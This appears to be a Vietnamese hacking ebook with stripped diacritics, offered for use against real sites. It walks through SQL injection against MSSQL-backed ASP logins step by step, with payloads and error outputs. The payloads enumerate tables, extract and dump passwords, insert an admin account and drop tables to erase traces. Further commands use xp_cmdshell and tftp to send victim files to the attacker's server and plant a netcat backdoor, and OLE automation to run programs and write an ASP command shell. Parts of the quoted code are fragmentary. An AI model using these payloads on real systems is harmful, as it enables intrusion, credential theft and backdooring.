By gi ta s test trc tip trn localhost. bn hy m tftpd32 ln bin my mnh thnh mt server tftp (lu phi tt ht firewall giao thc mi thc hin tt)
Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mc t cc file up hoc download ca bn khi thc hin trao i file vi client (v bn l server) (bn c th change nu thch).
Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )
V dng thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32)
Tn cng thc s:
-------------------------------BEGIN----------------------------------
Command1 : RUN COMMAND DOS trn my victim :
[link] exec master..xp_cmdshell [command]
Command 2 : DOWNLOAD FILE t my victim
[link] exec master..xp_cmdshell tftp PUT [path][filecandown]
V d : Ly Ip my victim :
(1)[link] exec master..xp_cmdshell ipconfig > a.txt
(2)[link] exec master..xp_cmdshell tftp PUT a.txt
----Gii thch :
(1) : run lnh ny : ipconfig >a.txt to file a.txt vi ni dung l kt qu ca lnh ipconfig
(2) : run tftp PUT a.txt chuyn file a.txt vi ni dung va to --> server (my chng ta )
Command3 : UPLOAD BACKDOOR ln my victim :
[link] exec master..xp_cmdshell tftp [i] GET backdoor [path muon backdoor c t]
v d : upload netcat vo C:\WINNT:
[link] exec master..xp_cmdshell tftp i GET nc.exe C:\WINNT\nx.exe
----------------------------------END------------------------------
3) Kt:
Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, up file, hu nh lm ch c server ri y . Cn hack nhanh hay chm, hiu qu bao nhiu l do bn
( Nu test thy li g xin lin h http://shacker.computed.net/baivet/nangcao/[email protected] )
Chc hack vuiy
vn SQL:
Hack Sql Inject nng cao
Cc bn th xem mt cu truy vn SQL:
select id, forename, surname from authors th 'id','forename' v 'surname' l column ca table author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trong table author.Xem cu truy vn sau:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu tt c nhng ai trong csdl vi forename = 'john' and surname = 'smith'
V vy khi vo gi tr u vo khng ng nh trong csdl liu:
Forename: jo'hn
Surname: smith
Cu truy vn tr thnh:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
Cu truy vn trn khi c x l th n s pht sinh li:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
L do l ta lng vo du nhy n "'" v gi tr vo tr thnh 'hn' sai so vi csdl vy s pht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:
Forename: jo'; drop table authors--
Table author s b xa ->nguy him phi khng
Nhn vo on code asp sau:y l mt form login
Login Page
Login
Username:
Password:
y l code 'process_login.asp'
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>
ACCESS DENIED
ACCESS GRANTED
Welcome,
0)
{
Login( cn );
}
cn.close();
}
Main();
%>
y l cu truy vn SQL:
var sql = "select * from users where username = '" + username + "'and password = '" + password + "'";
nu hacker vo nh sau:
Username: '; drop table users--
Password:
th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht ri ti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQL Injection )
trng username hacker c th vo nh sau:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
v d table user c to nh sau:
create table users( id int,
username varchar(255),
password varchar(255),
privs int
)
v insert vo:
insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )
Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1
Username: ' having 1=1--
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35
Tip tc ly cc ci cn li:
Username: ' group by users.id having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.
/process_login.asp, line 35
>> bit c column 'username'
' group by users.id, users.username, users.password, users.privs having 1=1--
Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khai thc ri, by gi n i ly gi tr ca n:
xc nh ni dung ca column ta dng hm sum()
Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35
Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th sao nh:
Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.
/process_login.asp, line 35
Vy l ta c th insert vo csdl:
Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--
Ly Version ca server:
Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int.
/process_login.asp, line 35
c th dng convert() nhng ti ch cc bn dng union ,cc bn th c ni dung ca cc user trogn table nh sau:
Username: ' union select min(username),1,1,1 from users where username > 'a'--
Chn gi tr nh nht ca username v cho n ln hn 'a' -> pht sinh li:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35
Vy l ta bit 'admin' acc tn ti,tip tc xem sao:
Username: ' union select min(username),1,1,1 from users where username 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35
Vy l khi c username -> ly pass:
Username: ' union select password,1,1,1 from users where username ='admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35
y l k thut m bn c th ly c user mt cch cao cp:
To mt script nh sau:
begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end
->cu truy vn:
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
To mt table 'foo' vi mt column l 'ret'
Tip tc:
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
/process_login.asp, line 35
(Hnh nh mrro dng kiu ny vo VDC)
Xo du vt:
Username: '; drop table foo--
Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mng ca server lun,mt trong s cch :
1-S dng xp_cmdshell khi c quyn 'sa'
2-S dng xp_regread c register,bao gm SAM
3-Chy link query trn server
4-To script trn server khai thc
5-S dng 'bulk insert' c bt c file no trn h thng
6-S dng bcp to qun cho text file trn server
7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX) chy trn server
[xp_cmdshell]
Chc cc bn cng nghe nhiu ri v d:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'
S dng thi hnh cc lnh ca dos vvv.. rt hu hiu
[xp_regread]
Cc hm lin quan...
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
V d:
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
Xc inh null-session share c tn ti trn server
exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
vv.. cn nhiu th na
[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
>ng qua cng bit n lm g...
[Importing text files into tables]
S dng 'bulk insert' chn text file vo th mc hin thi,to table n:
create table foo( line varchar(8000) )
tip tc:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
[Creating Text Files using BCP]
VD:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
[ActiveX automation scripts in SQL Server]
Dng 'wscript.shell'
vd:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Tren cu truy vn:
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
Dng 'scripting.filesystemobject' c file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
To script ASP thi hnh command:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh t nhng ch dn c bn ny.
Sql Inject M lnh
Ti bit chc rng cc bn y a s ch bit SQL injection bypass login, hm nay t xin mn php trnh by nhng k thut m ta c th lm nhiu iu hn l ch vt qua password ca mt trang b SQL injection.
Lu : a s kin thc ca ti di y ch dng cho server chy MySQL, MSSQL, cn nhng ci khc th khng chc.... Nu bn cha bit lnh SQL th khng nn c bi ny m nn tham kho n trc, OKie ??? Ti khng mun thy nhng cu tr li i loi nh --- "Tui chng hiu g ht ", "Si u th" ,.....
1)Ly tn table v column hin hnh:
Structure :
Login page (or any injection page)::::
username: ' having 1=1--
KQ: -------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
--------------------------------------
----> Ta c c TABLE VICTIM
Tip tc
username: ' group by VICTIM.ID having 1=1--
KQ :---------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
-------------------------------------------
Vy l ta c column Vuser
2) UNION nh m hiu qu
Vng tha cc bn, ta c th dng n ly c gn nh mi th .
Trc ht ti xin ni s qua ci Structure ca n :
Login page ::::
username : ' Union select [column] from [table] where [column2=...]--
password : everything
Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim l VUSER v VPASS th ta lm nh sau
username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password : everything
(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n s cho bn user u tin
KQ:-----------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
---------------------------------
Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column ca table VTABLE c Union ht. Structure ca n nh sau:
username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password : everything
Bn hy thm ",1" cho n khi kt qu ra i loi nh
--------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.
--------------------------------
Nh vy Pass ca user 'admin' l 'tuibihackroi'
Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vit hm nay ca ti : Ly sch database ca i phng.
3) Ly ht value ca mt column bit trong mt table bit
B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc):
Vi Vuser l admin ta c th ly c cc user khc
-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)
-------------------------
Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in ( vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(d nhin sau l mi password).
**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly cc user c cha t admin chng hn ta dng like : cu trc
-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like %admin%
-------------------------
4) Ly ht table v column ca ca database:
B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vi column TABLE_NAME (cha ton b table) v table : INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b column)
Cch s dng dng Union:
-----Login page :::::::
username: UNION SELECT TABLE_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.TABLES WHERE .
---------------------------
Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :
-----Login page :::::::
username: UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and
---------------------------
Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bn mt cht khi gp mt site b SQl injection
5) Khng cn UNION:
Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mt cch d dng hn thu thp info qua cc thng bo li
Structure :
---login page::::
user : ' + convert (int,(select @@version))--
-------------------------
Trn l mt v d bn ly version, gi y mun ly bt c info no bn ch cn thay vo ci "select @@version" nhng nh nu l ln u tin get info th thm TOP 1 vo nh
vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--
Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b
vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--
6) Run command SQL :
run command bn c th dng du ";"
Structure :
login page :::::
user :' ; [command]--
-----------------------------
vd: '; DROP TABLE VTABLE--
Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng t xin phn cho cc bn t nghin cu nh.
Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v trao di k nng bo mt.
http://thegioiebook.com